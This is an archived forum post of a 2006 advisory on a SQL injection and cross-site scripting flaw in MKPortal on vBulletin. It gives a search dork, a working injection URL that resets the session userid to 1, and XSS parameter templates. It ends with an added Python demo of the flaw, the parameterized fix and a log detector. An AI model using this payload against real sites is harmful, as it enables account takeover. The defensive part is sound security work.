Gonzalez Posted December 5, 2006

Dorks: "MKPortal 1.1 RC1"

Method found by nukedx.
Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: http://www.nukedx.com

This exploit works on MKPortal <= 1.1 RC1 with vBulletin <= 3.5.4

http://[victim]/[mkportaldir]/index.php?ind=',userid='1

With this example you can change your session's userid to 1.

Original advisory: http://www.nukedx.com/?viewdoc=26

# nukedx.com [2006-04-21]
--Security Report--
Advisory: vBulletin <= 3.5.4 with MKPortal 1.1 Remote SQL Injection Vulnerability.
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 21/04/06 22:36 PM
---
Contacts: {
ICQ: 10072
MSN/Email: nukedx at nukedx.com
Web: http://www.nukedx.com
}
---
Vendor: MKPortal (http://www.mkportal.it/)
Version: 1.1 RC1 and prior versions must be affected. (Runs on vBulletin!)
About: Via this method a remote attacker can inject arbitrary SQL queries into the ind parameter of index.php in MKPortal.
Vulnerable code can be found in the file mkportal/include/VB/vb_board_functions.php at lines 35-37; as you can see, it is easy to bypass this SQL update function.
Also there is a cross-site scripting vulnerability in pm_popup.php: the parameters u1, m1, m2, m3, m4 are not sanitized properly.
Level: Critical
---
How&Example:
SQL Injection:
GET -> http://[victim]/[mkportaldir]/index.php?ind=[SQL]
EXAMPLE -> http://[victim]/[mkportaldir]/index.php?ind=',userid='1
So with this example a remote attacker updates his session's userid to 1 and after refreshing the page he can log in as userid 1.
XSS:
GET -> http://[victim]/[mkportaldir]/includes/pm_popup.php?u1=[XSS]&m1=[XSS]&m2=[XSS]&m3=[XSS]&m4=[XSS]
---
Timeline:
* 21/04/2006: Vulnerability found.
* 21/04/2006: Contacted vendor and waiting for reply.
---
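The advisory says the session UPDATE in vb_board_functions.php splices the ind value into SQL, so a value with a quote and a comma closes the string and appends its own SET column. The following is an added example and is not code from the post or from MKPortal; the sessions table, column names, the 32-character identifier whitelist and the access-log lines are all constructed stand-ins. It shows the bug class on a toy SQLite table, the parameterized fix, an input whitelist in front of it, and a log check that flags ind values which fall outside that whitelist.

```python
import re
import sqlite3
from urllib.parse import urlsplit, parse_qs

# Constructed toy session table standing in for a portal's session store.
# Hypothetical stand-in: not MKPortal's real schema or code.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sessions (sid TEXT PRIMARY KEY, userid INTEGER, ind TEXT)")
    conn.execute("INSERT INTO sessions VALUES ('sess1', 42, 'news')")  # session of user 42
    conn.commit()
    return conn


def session_state(conn, sid):
    """Return (userid, ind) for a session so the effect of each update is visible."""
    return conn.execute("SELECT userid, ind FROM sessions WHERE sid=?", (sid,)).fetchone()


def update_ind_unsafe(conn, sid, ind):
    """The bug class the advisory describes: the request value is spliced into an UPDATE.
    A value containing a quote closes the string literal and the rest becomes more SET columns."""
    sql = "UPDATE sessions SET ind='" + ind + "' WHERE sid='" + sid + "'"
    conn.execute(sql)
    conn.commit()


def update_ind_param(conn, sid, ind):
    """Fix step 1: bind the value as a parameter, so it can only ever be stored as data."""
    conn.execute("UPDATE sessions SET ind=? WHERE sid=?", (ind, sid))
    conn.commit()


IND_RE = re.compile(r"[A-Za-z0-9_]{1,32}")  # assumption: module names are plain identifiers


def update_ind_safe(conn, sid, ind):
    """Fix step 2: reject anything that is not a plausible module name before it reaches SQL."""
    if not IND_RE.fullmatch(ind):
        raise ValueError("rejected ind value: %r" % ind)
    update_ind_param(conn, sid, ind)


def suspicious_ind_requests(log_lines):
    """Detection: return access-log lines whose index.php request carries an ind value
    outside the identifier whitelist (quotes, commas, keywords...)."""
    hits = []
    for line in log_lines:
        parts = line.split('"')
        if len(parts) < 2:
            continue
        fields = parts[1].split()              # e.g. ['GET', '/mkportal/index.php?ind=news', 'HTTP/1.0']
        if len(fields) < 2 or "index.php" not in fields[1]:
            continue
        query = parse_qs(urlsplit(fields[1]).query)   # parse_qs percent-decodes the values
        for value in query.get("ind", []):
            if not IND_RE.fullmatch(value):
                hits.append(line)
                break
    return hits


PAYLOAD = "',userid='1"   # the value quoted in the advisory

# Constructed access-log lines (Common Log Format); the second carries the URL-encoded payload.
SAMPLE_LOG = [
    '10.0.0.5 - - [21/Apr/2006:22:36:00 +0000] "GET /mkportal/index.php?ind=news HTTP/1.0" 200 5120',
    '10.0.0.9 - - [21/Apr/2006:22:37:10 +0000] "GET /mkportal/index.php?ind=%27%2Cuserid%3D%271 HTTP/1.0" 200 5120',
    '10.0.0.9 - - [21/Apr/2006:22:37:11 +0000] "GET /mkportal/index.php?ind=reviews HTTP/1.0" 200 4100',
]


if __name__ == "__main__":
    db = make_db()
    update_ind_unsafe(db, "sess1", PAYLOAD)
    print("unsafe:", session_state(db, "sess1"))   # userid silently becomes 1
    db = make_db()
    update_ind_param(db, "sess1", PAYLOAD)
    print("param :", session_state(db, "sess1"))   # payload stored as an inert string
    try:
        update_ind_safe(make_db(), "sess1", PAYLOAD)
    except ValueError as err:
        print("safe  :", err)
    print("flagged:", suspicious_ind_requests(SAMPLE_LOG))
```

The parameter binding alone already stops the userid change; the whitelist is kept in front of it because ind selects a module, so anything beyond an identifier has no legitimate use and is worth rejecting and logging. The same whitelist drives the log check, which is why it catches the percent-encoded form of the payload without needing a signature for it.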